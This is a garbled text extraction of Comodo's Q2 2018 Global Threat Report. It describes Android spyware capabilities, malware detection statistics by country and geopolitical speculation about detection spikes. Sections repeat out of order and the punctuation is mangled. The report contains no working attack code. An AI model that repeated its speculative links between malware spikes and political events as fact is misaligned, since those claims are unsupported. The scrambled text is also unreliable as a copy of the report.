532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
